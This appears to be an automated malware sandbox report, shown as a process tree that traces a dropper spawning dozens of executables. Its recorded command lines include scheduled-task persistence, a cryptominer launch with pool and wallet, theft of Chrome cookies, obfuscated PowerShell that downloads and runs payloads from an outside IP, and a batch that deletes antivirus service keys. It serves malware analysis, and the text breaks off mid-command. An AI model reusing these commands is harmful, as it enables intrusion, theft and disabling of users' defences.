        PID:7032
        
        C:\Users\Admin\AppData\Roaming\5028339.exe
        
        "C:\Users\Admin\AppData\Roaming\5028339.exe"
        7⤵
        
        PID:7060
      - C:\Users\Admin\Documents\8L9KJ4SmOWnBIT_QqueXpAVc.exe
        
        "C:\Users\Admin\Documents\8L9KJ4SmOWnBIT_QqueXpAVc.exe"
        6⤵
        
        PID:5664
        
        C:\Users\Admin\Documents\8L9KJ4SmOWnBIT_QqueXpAVc.exe
        
        "C:\Users\Admin\Documents\8L9KJ4SmOWnBIT_QqueXpAVc.exe"
        7⤵
        
        PID:5604
      - C:\Users\Admin\Documents\Ywi4szUu25c2kO1WhCz9yN3S.exe
        
        "C:\Users\Admin\Documents\Ywi4szUu25c2kO1WhCz9yN3S.exe"
        6⤵
        
        PID:5756
      - C:\Users\Admin\Documents\b5kojuAf9z1euGW43I09kTgX.exe
        
        "C:\Users\Admin\Documents\b5kojuAf9z1euGW43I09kTgX.exe"
        6⤵
        
        PID:5776
      - C:\Users\Admin\Documents\N_coQfcdHOdJjtfYQG51sJ0f.exe
        
        "C:\Users\Admin\Documents\N_coQfcdHOdJjtfYQG51sJ0f.exe"
        6⤵
        
        PID:6088
      - C:\Users\Admin\Documents\Zq9mdiUrt59wXdx43BOIIUT2.exe
        
        "C:\Users\Admin\Documents\Zq9mdiUrt59wXdx43BOIIUT2.exe"
        6⤵
        
        PID:5244
        
        C:\Users\Admin\Documents\Zq9mdiUrt59wXdx43BOIIUT2.exe
        
        C:\Users\Admin\Documents\Zq9mdiUrt59wXdx43BOIIUT2.exe
        7⤵
        
        PID:4740
      - C:\Users\Admin\Documents\OONIEMlHESpVJ3sw0qfanWB4.exe
        
        "C:\Users\Admin\Documents\OONIEMlHESpVJ3sw0qfanWB4.exe"
        6⤵
        
        PID:5400
        
        C:\Users\Admin\Documents\OONIEMlHESpVJ3sw0qfanWB4.exe
        
        C:\Users\Admin\Documents\OONIEMlHESpVJ3sw0qfanWB4.exe
        7⤵
        
        PID:4844
      - C:\Users\Admin\Documents\zKURfxjPS4BR79sPCwyR4Xix.exe
        
        "C:\Users\Admin\Documents\zKURfxjPS4BR79sPCwyR4Xix.exe"
        6⤵
        
        PID:4028
        
        C:\Users\Admin\Documents\zKURfxjPS4BR79sPCwyR4Xix.exe
        
        "{path}"
        7⤵
        
        PID:7980
        
        C:\Windows\SysWOW64\schtasks.exe
        
        /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
        8⤵
        Creates scheduled task(s)
        
        PID:8008
      - C:\Users\Admin\Documents\DZJ0O71zywaqbGmJvbKTejMr.exe
        
        "C:\Users\Admin\Documents\DZJ0O71zywaqbGmJvbKTejMr.exe"
        6⤵
        
        PID:5736
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5736 -s 780
        7⤵
        Program crash
        
        PID:6032
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5736 -s 816
        7⤵
        Program crash
        
        PID:3780
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5736 -s 1136
        7⤵
        Program crash
        
        PID:1568
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5736 -s 1156
        7⤵
        Program crash
        
        PID:6460
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5736 -s 1196
        7⤵
        Program crash
        
        PID:6804
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5736 -s 1200
        7⤵
        Program crash
        
        PID:7084
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5736 -s 1080
        7⤵
        Program crash
        
        PID:6424
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5736 -s 1144
        7⤵
        Program crash
        
        PID:6732
      - C:\Users\Admin\Documents\NbDpYCh2GWg0aCJUY6k_7Rc5.exe
        
        "C:\Users\Admin\Documents\NbDpYCh2GWg0aCJUY6k_7Rc5.exe"
        6⤵
        
        PID:5596
      - C:\Users\Admin\Documents\xHMa2YM4thAr0CNfB2AjwLko.exe
        
        "C:\Users\Admin\Documents\xHMa2YM4thAr0CNfB2AjwLko.exe"
        6⤵
        
        PID:4376
        
        C:\Users\Admin\Documents\xHMa2YM4thAr0CNfB2AjwLko.exe
        
        C:\Users\Admin\Documents\xHMa2YM4thAr0CNfB2AjwLko.exe
        7⤵
        
        PID:6780
      - C:\Users\Admin\Documents\W4VyEufKwd_BQNP5DmNWBz_Q.exe
        
        "C:\Users\Admin\Documents\W4VyEufKwd_BQNP5DmNWBz_Q.exe"
        6⤵
        
        PID:5252
      - C:\Users\Admin\Documents\3XXzbwgWkqtrRl6zXDj2ihhs.exe
        
        "C:\Users\Admin\Documents\3XXzbwgWkqtrRl6zXDj2ihhs.exe"
        6⤵
        
        PID:4176
        
        C:\Users\Admin\AppData\Local\Temp\is-F89LL.tmp\3XXzbwgWkqtrRl6zXDj2ihhs.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-F89LL.tmp\3XXzbwgWkqtrRl6zXDj2ihhs.tmp" /SL5="$3030E,138429,56832,C:\Users\Admin\Documents\3XXzbwgWkqtrRl6zXDj2ihhs.exe"
        7⤵
        
        PID:2632
      - C:\Users\Admin\Documents\r9MADWq5BguTsdDdVviCsthK.exe
        
        "C:\Users\Admin\Documents\r9MADWq5BguTsdDdVviCsthK.exe"
        6⤵
        
        PID:5968
        
        C:\Users\Admin\AppData\Roaming\4644371.exe
        
        "C:\Users\Admin\AppData\Roaming\4644371.exe"
        7⤵
        
        PID:1240
        
        C:\Users\Admin\AppData\Roaming\5569365.exe
        
        "C:\Users\Admin\AppData\Roaming\5569365.exe"
        7⤵
        
        PID:7096
      - C:\Users\Admin\Documents\I39IpzBYgf2YoPCySl_8RYAN.exe
        
        "C:\Users\Admin\Documents\I39IpzBYgf2YoPCySl_8RYAN.exe"
        6⤵
        
        PID:1856
        
        C:\Users\Admin\AppData\Roaming\1521415.exe
        
        "C:\Users\Admin\AppData\Roaming\1521415.exe"
        7⤵
        
        PID:5092
        
        C:\Users\Admin\AppData\Roaming\3641382.exe
        
        "C:\Users\Admin\AppData\Roaming\3641382.exe"
        7⤵
        
        PID:5044
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c a6d6262485.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3324
    - - C:\Users\Admin\AppData\Local\Temp\7zS8A6BE444\a6d6262485.exe
        
        a6d6262485.exe
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2348
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c c65040c72c7.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3292
    - - C:\Users\Admin\AppData\Local\Temp\7zS8A6BE444\c65040c72c7.exe
        
        c65040c72c7.exe
        5⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        
        PID:1380
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c 757755d929c68.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1172
    - - C:\Users\Admin\AppData\Local\Temp\7zS8A6BE444\757755d929c68.exe
        
        757755d929c68.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2500
      - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        6⤵
        Executes dropped EXE
        
        PID:4216
        
        C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
        7⤵
        Executes dropped EXE
        
        PID:4708
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        8⤵
        
        PID:6140
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        9⤵
        Creates scheduled task(s)
        
        PID:2380
        
        C:\Users\Admin\AppData\Roaming\services64.exe
        
        "C:\Users\Admin\AppData\Roaming\services64.exe"
        8⤵
        
        PID:5216
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        9⤵
        
        PID:7484
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        10⤵
        Creates scheduled task(s)
        
        PID:7816
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        9⤵
        
        PID:7588
        
        C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
        9⤵
        
        PID:7752
        
        C:\Users\Admin\AppData\Local\Temp\1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4856
        
        C:\Users\Admin\AppData\Roaming\6694228.exe
        
        "C:\Users\Admin\AppData\Roaming\6694228.exe"
        8⤵
        
        PID:6012
        
        C:\Users\Admin\AppData\Roaming\1119542.exe
        
        "C:\Users\Admin\AppData\Roaming\1119542.exe"
        8⤵
        
        PID:3780
        
        C:\Users\Admin\AppData\Roaming\3797372.exe
        
        "C:\Users\Admin\AppData\Roaming\3797372.exe"
        8⤵
        
        PID:1140
        
        C:\Users\Admin\AppData\Roaming\2096115.exe
        
        "C:\Users\Admin\AppData\Roaming\2096115.exe"
        8⤵
        
        PID:3048
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4964
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        8⤵
        
        PID:2068
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        9⤵
        Kills process with taskkill
        
        PID:6716
        
        C:\Users\Admin\AppData\Local\Temp\3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5076
        
        C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        8⤵
        
        PID:5328
        
        C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        9⤵
        
        PID:8060
        
        C:\Users\Admin\AppData\Local\Temp\6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\6.exe"
        7⤵
        Executes dropped EXE
        
        PID:4368
        
        C:\Users\Admin\AppData\Local\Temp\11111.exe
        
        C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        8⤵
        
        PID:6156
        
        C:\Users\Admin\AppData\Local\Temp\11111.exe
        
        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        8⤵
        
        PID:6780
        
        C:\Users\Admin\AppData\Local\Temp\5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\5.exe"
        7⤵
        Executes dropped EXE
        
        PID:2968
        
        C:\Users\Admin\AppData\Local\Temp\5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\5.exe" -a
        8⤵
        
        PID:4512
        
        C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
        7⤵
        
        PID:4628
        
        C:\Users\Admin\AppData\Local\Temp\7.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7.exe"
        7⤵
        
        PID:4344
        
        C:\Users\Admin\AppData\Local\Temp\tmp3BB2_tmp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tmp3BB2_tmp.exe"
        8⤵
        
        PID:5628
        
        C:\Windows\SysWOW64\dllhost.exe
        
        "C:\Windows\System32\dllhost.exe"
        9⤵
        
        PID:6528
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c cmd < Sia.tiff
        9⤵
        
        PID:6688
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd
        10⤵
        
        PID:4476
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /R "^pkGGAfikiUHgkUsEdYECSyCYSsHNpFrexxWaHUdYNNqBjTuNBNmlmGvtIHOoIxwBQETRXZXvIGOytwLYlTkcySDOYSJZuidzLnLI$" Sai.tiff
        11⤵
        
        PID:5072
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Orlo.exe.com
        
        Orlo.exe.com S
        11⤵
        
        PID:4748
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Orlo.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Orlo.exe.com S
        12⤵
        
        PID:6828
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping localhost -n 30
        11⤵
        Runs ping.exe
        
        PID:4880
        
        C:\Users\Admin\AppData\Local\Temp\4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\4.exe"
        7⤵
        Executes dropped EXE
        
        PID:4136
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 668
        8⤵
        Program crash
        
        PID:5856
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 696
        8⤵
        Program crash
        
        PID:3424
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 752
        8⤵
        Program crash
        
        PID:5780
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 716
        8⤵
        Program crash
        
        PID:5556
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 892
        8⤵
        Program crash
        
        PID:2476
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 1008
        8⤵
        Program crash
        
        PID:5748
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 1108
        8⤵
        Program crash
        
        PID:6008
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 1280
        8⤵
        Program crash
        
        PID:4560
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 1584
        8⤵
        Program crash
        
        PID:6708
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 1620
        8⤵
        Program crash
        
        PID:5532
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 1324
        8⤵
        Program crash
        
        PID:4904
        
        C:\Users\Admin\AppData\Local\Temp\8.exe
        
        "C:\Users\Admin\AppData\Local\Temp\8.exe"
        7⤵
        
        PID:4164
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 4164 -s 1532
        8⤵
        Program crash
        
        PID:7128
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c 29dc9096b9.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1304
    - - C:\Users\Admin\AppData\Local\Temp\7zS8A6BE444\29dc9096b9.exe
        
        29dc9096b9.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3148
      - C:\Users\Admin\AppData\Roaming\1642518.exe
        
        "C:\Users\Admin\AppData\Roaming\1642518.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4356
      - C:\Users\Admin\AppData\Roaming\6326952.exe
        
        "C:\Users\Admin\AppData\Roaming\6326952.exe"
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:4416
        
        C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
        
        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
        7⤵
        Executes dropped EXE
        
        PID:4976
      - C:\Users\Admin\AppData\Roaming\6493146.exe
        
        "C:\Users\Admin\AppData\Roaming\6493146.exe"
        6⤵
        Executes dropped EXE
        
        PID:4480
      - C:\Users\Admin\AppData\Roaming\6911857.exe
        
        "C:\Users\Admin\AppData\Roaming\6911857.exe"
        6⤵
        Executes dropped EXE
        
        PID:4532
      - C:\Users\Admin\AppData\Roaming\5323963.exe
        
        "C:\Users\Admin\AppData\Roaming\5323963.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4620
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ed10a8b2b3d6.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:740
    - - C:\Users\Admin\AppData\Local\Temp\7zS8A6BE444\ed10a8b2b3d6.exe
        
        ed10a8b2b3d6.exe
        5⤵
        Executes dropped EXE
        
        PID:2480
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im ed10a8b2b3d6.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS8A6BE444\ed10a8b2b3d6.exe" & del C:\ProgramData\*.dll & exit
        6⤵
        
        PID:4244
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im ed10a8b2b3d6.exe /f
        7⤵
        Kills process with taskkill
        
        PID:6504
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        7⤵
        Delays execution with timeout.exe
        
        PID:7388
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c 6f0ef9103.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2120
    - - C:\Users\Admin\AppData\Local\Temp\7zS8A6BE444\6f0ef9103.exe
        
        6f0ef9103.exe
        5⤵
        Executes dropped EXE
        
        PID:3948

C:\Users\Admin\AppData\Local\Temp\is-OBO9F.tmp\a6d6262485.tmp
"C:\Users\Admin\AppData\Local\Temp\is-OBO9F.tmp\a6d6262485.tmp" /SL5="$D01E0,138429,56832,C:\Users\Admin\AppData\Local\Temp\7zS8A6BE444\a6d6262485.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:2624

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
PID:5900

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:5832

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:808

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:6680
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:6532

C:\Users\Admin\AppData\Local\Temp\D487.exe
C:\Users\Admin\AppData\Local\Temp\D487.exe
1⤵
PID:6864
- C:\ProgramData\Runtimebroker.exe
  "C:\ProgramData\Runtimebroker.exe"
  2⤵
  PID:1292
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://193.56.146.55/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'
    3⤵
    PID:5500
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell $dll =[Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData('http://193.56.146.55/Api/GetFile2'));$theType = $dll.GetType('filedll.Program');$method = $theType.GetMethod('Start');$method.Invoke([System.Activator]::CreateInstance($theType),@());rv dll,theType,method
    3⤵
    PID:7496
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell" Get-MpPreference -verbose
      4⤵
      PID:7900
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" @echo off Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f set "osX=%PROCESSOR_ARCHITECTURE%" if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64" if "%osX%"=="x86" ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f Reg Add 